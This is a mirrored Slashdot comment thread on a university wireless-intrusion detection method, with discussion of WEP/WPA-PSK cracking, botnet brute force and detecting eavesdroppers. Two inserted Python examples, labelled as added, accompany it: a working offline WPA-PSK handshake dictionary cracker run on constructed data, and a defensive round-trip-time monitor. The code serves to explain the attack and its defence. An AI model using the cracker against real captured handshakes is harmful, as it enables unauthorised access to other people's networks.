Slashdot Mirror


New Way to ID Invisible Intruders on Wireless LANs

Bergkamp10 writes "Australia's University of Technology in Queensland has created a groundbreaking new system that can detect invisible intruders on wireless LANs. Wireless networks have been almost impossible to thoroughly secure as they possess no clearly defined boundaries; instead they are defined by the quality and strength of the receiving antenna. QUT Information Security Institute researcher Dr Jason Smith has invented a new system to detect eavesdropping on unencrypted networks or active hijackings of computer sessions when a legitimate user who is logged onto the network leaves the connection. Smith has created a series of monitoring techniques that when used together can detect both attackers and configuration mistakes in network devices."

26 of 122 comments

  1. Virtually impossible? by morgan_greywolf · · Score: 5, Interesting

    I don't know about that. I use WPA-PSK security on my WLAN, and I regularly monitor my network using ordinary means (logs, IDS, etc.) and I haven't seen any evidence of intruders, invisible or otherwise. I suppose this is one more thing I could add to my arsenal, but how many with security turned on really have trouble with this?

    1. Re:Virtually impossible? by cbiltcliffe · · Score: 4, Insightful

      and I regularly monitor my network using ordinary means (logs, IDS, etc.) and I haven't seen any evidence of intruders, invisible or otherwise. I suppose this is one more thing I could add to my arsenal, but how many with security turned on really have trouble with this?
      If the intruders were invisible, how would you see them in logs and IDS? They're invisible. Passive monitoring won't show up in any logs. I know, because I do it sometimes as part of my security service to my customers. You can break into a WEP-encrypted moderate-traffic wireless network without sending a single packet. Once you're in, you can capture all traffic on that network and save it, again, without sending a single packet.
      WPA can be cracked if someone uses a simple passphrase, and even random passphrases can be cracked without a whole lot of effort simply by renting part of a botnet, or running your own.

      Using the Storm botnet as an example:

      There were estimates that put the botnet as large as 50,000,000 computers. Having done WPA-PSK key cracking on a P4 1.6 laptop, it can run around 30 passphrases/second. My desktop is significantly faster, although I haven't actually tried PSK cracking on it. I'd assume probably 45 / second or more. It's not a state of the art machine, by any means. Probably about average.

      So if we assume an 8 character random passphrase, (which is all a lot of people will use, so it's easier to remember) that you can type on your keyboard, (again, who's going to use Alt-Numpad combinations?) there are 96 possible keystroke characters that can make up each byte. 96^8 = 7213895789838336 possible password combinations.
      Assuming 45 passphrases / second for each machine, it will take, using this botnet, just over 37 days to break that password. That's assuming the most complex password possible for 8 characters. Realistically, you can take out any special character that's not in 13375p3@k, and for most all you'd need is numbers and letters. That'll cut your time significantly.
      Yes, that's only an 8 character password, which will take 96 times as long to break with only 1 extra character, but how many people, who don't use their full allotment of 63-characters of randomness, are going to use something like "password", "dave sucks", "fleabert" (name of their cat), or even "fleabert scratches too much" as their passphrase?
      Now you've got standard words, which can easily be pulled from a dictionary and put together in different combinations until the passphrase is cracked. Trivial, with enough computing power. And unfortunately, the only people who have access to that kind of computing power, are (I shudder to use the word) cybercriminals.
      --
      "City hall" in German is "Rathaus". Kinda explains a few things......
    2. Re:Virtually impossible? by morgan_greywolf · · Score: 3, Insightful

      Of course, any security can be cracked... I personally use a shared key that is significantly longer than that. Adding 1 extra character over 8 makes it 96^9, but adding, say, 3 extra characters makes it 6382393305518410039296 possible password combinations, which would take that same botnet like 90,000 years to crack.

      Oh, yeah, and bear in mind: those 50,000,000 would all have to be in range of the access point and would have to not overwhelm the access point. Even the best Cisco Aironet equipment isn't going to handle that kind of load.

    3. Re:Virtually impossible? by Anonymous Coward · · Score: 2, Informative

      Yeah, but if you set up your wireless network with a specific set of MACs and only allow those MACs to log in, keep all of your machines on so someone can't hijack the MAC, and disable logins to your router from anything but one of those MACs, they won't even be able to connect even after they crack your password unless they can flood your router or otherwise break it. Very few people can do this.

      If you augment this with weekly password changes and the strongest possible password, they aren't getting in unless they control a lot of systems. Yeah, they could still break your wireless network eventually, but there are other wireless networks that are far easier to get into so they'd move on.

      Beyond that you secure the hosts on your network as well.

      Security isn't about making your network unbreakable, which is impossible. It's about making your network not worth someone's time to break into. You do this with layered security and being polite.

      Network crackers go for the low hanging fruit every time, unless it's a targeted attack, which most home users don't ever need to worry about unless they piss off the wrong person. They'll get your neighbor that didn't change the default password and doesn't password his hosts. There's a buffet out there of easy to break networks, so chances are, if you take reasonable precautions, and don't go around flaming people, you are fine.

      Personally I don't run a wireless network. I pulled Cat5-e to every room in the house while I was rehabbing and don't need it. I did this before WEP matured because I didn't trust wireless at the time, wired networks Just Work(tm) and are much faster. Of course it's easy to do this when your walls are open 8)

      -AC

    4. Re:Virtually impossible? by Alpha830RulZ · · Score: 2, Interesting

      Thanks for laying that out. I don't know what makes this so hard for people to get/do. Come up with 3 to 5 words of something that means something to you, separate with some punctuation, and make sure it's around even only 20 characters, and it should take a million machine botnet something like 10^21 years to crack, assuming the 45 tries a second metric. E.g., "IHave7FavoriteFl()wer&" should be good for something like the remaining life of the universe. (3.6*10^27 years, by my calculations)

      Even so called security professionals seem to have trouble with this. One of my favorite gripes is the security team at my new employer, who insist on forcing us to use 8 to 10 character passwords, no more, no less. They demand a numeral and a special character, which actually reduces the search space substantially. I am prone to setting up passwords for people like "Eagles~In*Trees" which is easy to remember, and tough to crack, but they won't let me any more, forcing us to issue things like "sFg#8Jk@", which the user promptly writes on a sticky note and pastes to the monitor so they won't forget it.

      --
      I was taught to respect my elders. The trouble is, it's getting harder and harder to find some.
    5. Re:Virtually impossible? by kickdown · · Score: 2, Informative

      "WPA can be cracked if someone uses a simple passphrase, and even random passphrases can be cracked without a whole lot of effort simply by renting part of a botnet, or running your own."

      You are assuming that WPA needs a human-configured passphrase here. Your calculations are all nice, but they refer to WPA-PSK (pre-shared key). If you use WPA with IEEE 802.1X (sometimes called WPA-"Enterprise"), a PMK (Pairwise Master Key) is generated by an AAA server *anew for every session*. I.e. as soon as someone logs off and on again, your calculations have to start from scratch. I'm assuming people don't stay connected 37 days continuously on a WiFi connection, so your botnet attack is rendered useless. To be on the safe side, you can set your APs to negotiate new keys at your personal paranoia level time interval even when connections persist.

      Even with WPA-PSK, your reasoning is only correct if you really want the PMK of WPA-PSK. Your botnet could be faster if you just want the current session key: it is 128 Bits in length (both with TKIP encryption and AES), so you only need to try 2^128 numbers to get in. The amount of randomness for the PMK is irrelevant if you just want to get into a session quick-and-dirty. Another reason for WPA users to rekey every so often.

      WPA-Enterprise is used worldwide in educational institutions in a free (as in spirit and in beer) manner right now, including worldwide roaming: check http://www.eduroam.org./. Even in Queensland numerous universities are participating and thus have something at their disposal that is way less susceptible than static session keys. http://www.aarnet.edu.au./Content.aspx?p=133/ suggests that University of Queensland is in, so I guess they are just doing the research to show people how insecure WLAN networking is if you *don't* use IEEE 802.1X :-) Yes, that was a shameless sales pitch. This is slashdot, I'm *supposed* to promote my pet projects here, right?

      --
      Continuous positive slashdot karma since... uh, maybe next year.
    6. Re:Virtually impossible? by cbiltcliffe · · Score: 2, Informative

      You need to look into cracking WPA-PSK. You don't need to know anything about the traffic. All you need are 4 packets, one if which is a hash of the passphrase. You hash your passphrase list until you find one that matches the hash captured from the AP, and then you've got your passphrase. No extra traffic necessary.

      --
      "City hall" in German is "Rathaus". Kinda explains a few things......
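The offline check cbiltcliffe describes (hash candidates locally until one matches what was captured from the handshake), written out as an added example that is not code from this thread or from any product mentioned in it. What the capture actually yields is not a hash of the passphrase but a MIC on EAPOL-Key message 2, keyed by a key derived from the passphrase: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32), PTK = 802.11i PRF-512 over PMK, the two MAC addresses and the two nonces, MIC = HMAC-SHA1(KCK, frame)[:16]. The SSID, MAC addresses, nonces and the "captured" message 2 are constructed inside the script from a known passphrase so that it runs offline; a real attack reads the same fields from a pcap. The `brute_force_seconds` helper only reproduces the back-of-envelope figure from the thread.

```python
"""Offline WPA/WPA2-PSK dictionary attack against a captured 4-way handshake.

Added example, not code from the Slashdot thread or from any product in it.
Everything "captured" below (SSID, MAC addresses, nonces, EAPOL-Key message 2)
is CONSTRUCTED in-process from a known passphrase so the script runs offline;
a real attack reads the same fields from a pcap.
"""
import hashlib
import hmac

# Constructed handshake parameters (assumptions, not real network values).
SSID = b"fleabert"
AP_MAC = bytes.fromhex("001122334455")    # authenticator address (AA)
STA_MAC = bytes.fromhex("66778899aabb")   # supplicant address (SPA)
ANONCE = bytes(range(32))                 # real nonces are random
SNONCE = bytes(range(32, 64))
MIC_OFFSET = 81                           # MIC field offset inside the EAPOL-Key frame


def pmk_from_passphrase(passphrase: bytes, ssid: bytes) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    Each candidate costs 2 x 4096 HMAC-SHA1 calls; that, not the MIC compare,
    is what limits a cracker to tens of candidates per second per CPU."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return out[:64]          # KCK = PTK[0:16], KEK = PTK[16:32], TK = PTK[32:48]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/CCMP): MIC = HMAC-SHA1(KCK, frame with
    the 16-byte MIC field zeroed), truncated to 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(kck: bytes, snonce: bytes) -> bytes:
    """Construct the supplicant's EAPOL-Key message 2 with a valid MIC. This is
    the frame an attacker must capture: it carries SNonce and a MIC keyed by the
    passphrase-derived KCK. Layout follows the 802.1X/EAPOL-Key format."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")
    body = (b"\x02"                         # descriptor type: RSN
            + b"\x01\x0a"                   # key info: version 2, pairwise, MIC set
            + b"\x00\x10"                   # key length 16
            + (1).to_bytes(8, "big")        # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, IV, RSC, ID
            + bytes(16)                     # MIC placeholder
            + len(rsn_ie).to_bytes(2, "big") + rsn_ie)
    frame = b"\x02\x03" + len(body).to_bytes(2, "big") + body   # 802.1X v2, EAPOL-Key
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


def crack(frame: bytes, wordlist):
    """For each candidate derive PMK -> PTK -> MIC and compare with the captured
    MIC. Nothing is transmitted; all the work is local to the attacker."""
    captured_mic = frame[MIC_OFFSET:MIC_OFFSET + 16]
    for candidate in wordlist:
        pmk = pmk_from_passphrase(candidate, SSID)
        kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
        if hmac.compare_digest(eapol_mic(kck, frame), captured_mic):
            return candidate
    return None


def brute_force_seconds(alphabet_size: int, length: int, candidates_per_second: float) -> float:
    """Worst-case time to exhaust a random passphrase space at a given rate."""
    return alphabet_size ** length / candidates_per_second


def captured_handshake() -> bytes:
    """Stand-in for a pcap: message 2 as built by a station using the 'secret' passphrase."""
    secret = b"fleabert scratches too much"   # constructed victim passphrase
    pmk = pmk_from_passphrase(secret, SSID)
    kck = ptk_from_pmk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)[:16]
    return build_msg2(kck, SNONCE)


def demo():
    """Run the dictionary attack against the constructed capture."""
    wordlist = [b"password", b"dave sucks", b"fleabert", b"fleabert scratches too much"]
    return crack(captured_handshake(), wordlist)


if __name__ == "__main__":
    print("recovered:", demo())
    days = brute_force_seconds(96, 8, 50_000_000 * 45) / 86400
    print(f"96^8 keyspace at 2.25e9 candidates/s: {days:.1f} days")
```

Because the PBKDF2 step is salted with the SSID, a rainbow table only helps against networks with the same SSID, which is why attackers precompute tables for common defaults; an uncommon SSID plus a long passphrase pushes the work back onto per-candidate PBKDF2.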
  2. Doesn't seem too practical by faloi · · Score: 5, Insightful

    The description is, basically, they use the signal strength and round trip times of the signals to figure out if someone unauthorized is on your network. The downside is that, in large corporate wireless networks, I would think people tend to be pretty mobile and there won't be a reliable indicator that the odd signal from slightly too far away isn't just somebody who remembered one last thing on the way to their car. Smaller wireless networks aren't likely to care enough to spend the time it takes to tell.

    It's an interesting idea, but I have a hard time seeing it become widespread.

    --
    "It is a miracle that curiosity survives formal education." -Albert Einstein
    1. Re:Doesn't seem too practical by cyriustek · · Score: 2, Insightful

      Whilst you have somewhat of a point, the odd occasion where one may forget something and try to access the LAN from his car is an outlier in the data set. If the system notices someone from that location connecting to the network, it can either force a new authentication event requiring a local cert, or simply shut down the AP the external person is connecting to. (Preferably shutting it down.)

      As an aside, the company can also have a policy explicitly forbidding access from the parking lot. If what they had to do is so important, they can either go into the building, or wait until they are home and use their VPN connection.

  3. Damn by FredDC · · Score: 4, Funny

    What? No, but this means that I[NO CARRIER]

    --
    09 f9 11 02 9d 74 e3 5b d8 41 56 c5 63
  4. "detect eavesdropping" by Anonymous Coward · · Score: 3, Insightful

    Yeah, right, detect eavesdropping. Any other snake oil you want to sell?

  5. Triangulation by JustKidding · · Score: 4, Interesting

    So, basically, they are just triangulating every node on the network, and detecting when a node is outside a given range (outside the building?), or seems to suddenly jump to another location (session hijacking)? Would this still work if the attacker is using a directional, high-gain antenna to prevent effective triangulation? Also, varying the signal strength and round trip time could throw this off, but even if the exact location of the attacker cannot be determined because of it, the alarm could still be raised.

    1. Re:Triangulation by Ungrounded+Lightning · · Score: 2, Interesting

      So, basically, they are just triangulating every node on the network, and detecting when a node is outside a given range (outside the building?), or seems to suddenly jump to another location (session hijacking)? Would this still work if the attacker is using a directional, high-gain antenna to prevent effective triangulation?

      Sounds like they're not "triangulating" - computing the DIRECTION to a station from two monitoring locations in order to identify the station's location as the third point of a triangle. Instead they're measuring the round-trip time for a probe/response, which measures the distance (plus internal delays in the remote station) without identifying direction.

      Adding delay can make a station appear to be farther than it is, but not nearer. So short of finding a way to send signals backward in time (or responding enough faster than the standard firmware to fool the monitor) you can't spoof being closer than you are.

      Which does nothing for a pure eavesdropper. But if the "eavesdropper"'s firmware associates with the eavesdropped network enough that it turns on its transmitter and responds to low-level protocol probes, it CAN be detected even if the user sends no traffic.

      They're also using signal strength measurement - perhaps to work around unknown firmware response time. That might make them subject to spoofing by using a directional antenna and/or increasing transmit power to make the signal appear stronger, and thus closer, than it actually is.

      (Another approach would be using multiple receivers at known (or self-measured relative) locations to do a LORAN-style triangulation on particular transmissions from the remote station, measuring the arrival-time differences at three or more stations to locate the remote station at the intersection of two or more hyperbolas. But that involves synchronizing time-bases between the monitoring stations in a way that would be beyond normal firmware's capabilities. It would also become less accurate as the distance to the remote station increases.)

      --
      Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
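Ungrounded Lightning's observation that a station can add delay but never remove it is what makes the round-trip-time check worth having: an outside station cannot make itself look inside, only an inside one can look outside. The following is an added example, not the QUT system or any product named in this thread, of a monitor applying that check together with the signal-strength and "sudden jump" checks discussed above. The probe log, the 10 us station turnaround, the 60 m site radius and the jump thresholds are all assumed values, and RSSI is treated as advisory because transmit power and antenna gain are under the attacker's control.

```python
"""Round-trip-time and RSSI sanity checks on wireless stations.

Added example; not the QUT system or any product named in the thread. The
probe/response log and every threshold below are constructed/assumed values.
"""

C_M_PER_US = 299.792458     # speed of light, metres per microsecond
TURNAROUND_US = 10.0        # assumed station turnaround (SIFS + firmware); vendor specific
SITE_RADIUS_M = 60.0        # assumed radius of the building as seen from the monitor
JUMP_M = 40.0               # assumed max plausible movement between two probes
RSSI_JUMP_DB = 15.0         # assumed max plausible RSSI swing between two probes

# Constructed probe log: time_s station rtt_us rssi_dbm.
# Station ...:02 is "hijacked" at t=5 by a box far away; ...:03 is outside throughout.
LOG = """\
0 aa:bb:cc:00:00:01 10.31 -48
0 aa:bb:cc:00:00:02 10.18 -55
0 aa:bb:cc:00:00:03 11.20 -52
5 aa:bb:cc:00:00:01 10.33 -49
5 aa:bb:cc:00:00:02 10.95 -83
5 aa:bb:cc:00:00:03 11.18 -53
"""


def distance_estimate_m(rtt_us: float) -> float:
    """Distance implied by the measured round trip. A station can add delay but
    not remove it, so its true distance is at most this value: an outside station
    cannot evade the 'outside' check, though slow firmware on an inside one can
    trip it (a false positive, which is the safe direction)."""
    return max(0.0, rtt_us - TURNAROUND_US) * C_M_PER_US / 2.0


def parse_log(text: str):
    """Parse 'time station rtt_us rssi' lines into (time, station, rtt, rssi) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        t, sta, rtt, rssi = line.split()
        records.append((float(t), sta.lower(), float(rtt), float(rssi)))
    return sorted(records)            # by time, then station


def analyze(records):
    """Return (time, station, kind, value) alerts.
    'outside': RTT-derived distance exceeds the site radius (spoof-resistant,
    see distance_estimate_m). 'jump': distance or RSSI changed implausibly
    between consecutive probes of the same station, the signature of a session
    taken over from another location (advisory only: RSSI can be faked with
    transmit power or a directional antenna)."""
    alerts = []
    last = {}                         # station -> (distance_m, rssi_dbm)
    for t, sta, rtt_us, rssi in records:
        d = distance_estimate_m(rtt_us)
        if d > SITE_RADIUS_M:
            alerts.append((t, sta, "outside", round(d, 1)))
        if sta in last:
            prev_d, prev_rssi = last[sta]
            if abs(d - prev_d) > JUMP_M or abs(rssi - prev_rssi) > RSSI_JUMP_DB:
                alerts.append((t, sta, "jump", round(d - prev_d, 1)))
        last[sta] = (d, rssi)
    return alerts


if __name__ == "__main__":
    for alert in analyze(parse_log(LOG)):
        print(alert)
```

The turnaround constant is the weak point in practice: it differs per chipset and firmware, so a deployment would calibrate it per known client (the fingerprinting approach mentioned further down the thread) rather than use one global value.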
  6. Makes sense. by ufoolme · · Score: 2, Interesting

    Aussies are really into all this wireless stuff!

    I'm fairly new to all this but at a very basic level it seems to make sense.
    It's just a more complex method of looking at the flashing lights on the modem to see if it's in sync with your known wireless connections. -- Okay, a lot more complex than that.

    I wonder if this can be applied to other wireless systems, e.g., radio systems. If so it would be very useful.

  7. Re:Signal roundtrip times is the tipoff by Silver+Sloth · · Score: 2, Insightful

    But leave the router open, wouldya? No, I won't.

    I don't want anyone not authorised by me on my network. I see no reason why I 'ought to be required to provide this service to all listeners'. Sorry, my network, my rules.
    --
    init 11 - for when you need that edge.
  8. eavesdropping by backwardMechanic · · Score: 5, Interesting

    You can detect many things, but not eavesdropping. Your little wifi card broadcasts all kinds of data, in all directions. I can listen in and say nothing. How are you going to detect that? Warping of the ether?

    1. Re:eavesdropping by atdt1991 · · Score: 2, Interesting

      Quantum Entanglement! We've got on-board chips for that ... right?

    2. Re:eavesdropping by Ungrounded+Lightning · · Score: 4, Insightful

      You can detect many things, but not eavesdropping. Your little wifi card broadcasts all kinds of data, in all directions. I can listen in and say nothing. How are you going to detect that?

      Your firmware might react to being associated with a network enough to eavesdrop it by also responding to low-level configuration traffic. If that happens, even if you don't send any data the firmware may respond to probes, letting the network know you're listening.

      If you're truly eavesdropping you're undetectable. But do you know what the vendor put in the binary blob?

      --
      Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
  9. Nothing to see here, move along by Anonymous Coward · · Score: 2, Funny

    "Depending on how sensitive the network is, armed security guards could be deployed [...]"

    And they would shoot the guy with the laptop in the lobby? Whoops, wrong guy. It was the other guy in the lobby. Nope, it was the woman in the parking lot. Wait, no, it was an anomaly.

    Sounds more like a weak attempt at a research project.

  10. Australia's University of Technology ? by mybecq · · Score: 3, Informative

    Australia's University of Technology in Queensland
    Otherwise known in reality as the Queensland University of Technology in Australia.
    Zonk or Bergkamp10, please do us all a favour and don't change the name of institutions.
  11. How is this ground breaking? by computerchimp · · Score: 5, Insightful

    1) hopping from one router to another is detected via traditional means
    2) higher than average roundtrip times are noticed via traditional means
    3) signal is triangulated via traditional means to put a location on a suspected signal.

    A new but obvious procedure that someone has decided to put to paper and product. It is a nice product to notice but this is about as ground breaking as peanut butter and chocolate.

    CC

  12. Re:Signal roundtrip times is the tipoff by X0563511 · · Score: 2, Insightful

    What I love is that (the summary at least) article states you can use this to see if someone is monitoring your network.

    Excuse me? How in the hells would you tell of someone was passively reading incoming radio waves? Isn't that the point of active vs passive radar systems, for instance? You can't!

    --
    For large sets, this will be our guide even unto death, for the LORD will work for each type of data it is applied to...
  13. Re:Signal roundtrip times is the tipoff by jasen666 · · Score: 2, Insightful

    Because if they download kiddie pr0n, it's *MY* IP address that gets logged, and my house the FBI raids looking for said kiddie pr0n.
    Not worth the risk to be a good Samaritan to the neighbor's who can't afford their own internet.

  14. This is new? Products that do some/all now... by myvirtualid · · Score: 2, Interesting

    Not to flame or troll or slashvertise, but how is this new? I was at a conference recently where the coolest security product on display was from http://www.airtightnetworks.net/: Their WIPS can be configured with an organization's known wireless clients (MAC address, make, HW and SW versions, etc.), and then detect systems that shouldn't be there.

    According to the reseller's CTO - I had the good fortune to stop by the booth before he and the COO departed and the booth was left with only salesdroids - the system has an extensive database of fingerprints - hardware, software, etc., think of timings and the like specific to particular combinations of OS, firmware, and chipset.

    This raises the bar for a snooper: They not only have to clone your MAC addresses, etc., they have to clone the MAC, etc., on a box running the same OS, firmware, chipset, as the legit box. And they have to get the WPA keys right.

    (They also have a neato WPA key management app to raise that bar, too.)

    Apologies if this seems slashvertisical, seems to me the best way to debunk someone's claim of newnessess and neverbeendonebeforedness is to point to a real selling product that does all of the non-vapourware things the someone claims to have invented.

    --
    I'm here EdgeKeep Inc.
  15. Re:Wireless 101 by robbeh · · Score: 2, Informative

    WEP is useless and can be cracked in less than 10 minutes using any laptop made in the last 10 years. Keep on using that WPA though.
    MAC filtering is useless because anyone with Kismet can see the active MAC addresses on the network.
    SSID hiding is useless because anyone with Kismet can see the active SSIDs around them.

    Someone mentioned it earlier, but have a look at this:
    http://blogs.zdnet.com/Ou/index.php?p=43

  16. Reading TFA. by Eevee · · Score: 2, Informative

    Well, the first thing you need to do is actually start reading the article you're using for support. From the fine article you quoted:

    The FBI says it found CDs with child porn in Perez's room, the only one it searched.

    Up to the time you can show how a wifi connection will make a physical CD magically show up in a room, then any argument about plausible deniability based off this case is full of it. You can't claim someone else was using your wireless connection to download child porn when you have a big stack of CDs with child pornography on them. Nobody is stupid enough to believe that. The only way this could have been a test case would be if they hadn't found any evidence beside the network traffic.


    What this shows is that illegal traffic coming to/from your address constitutes probable cause, which is a different kettle of fish.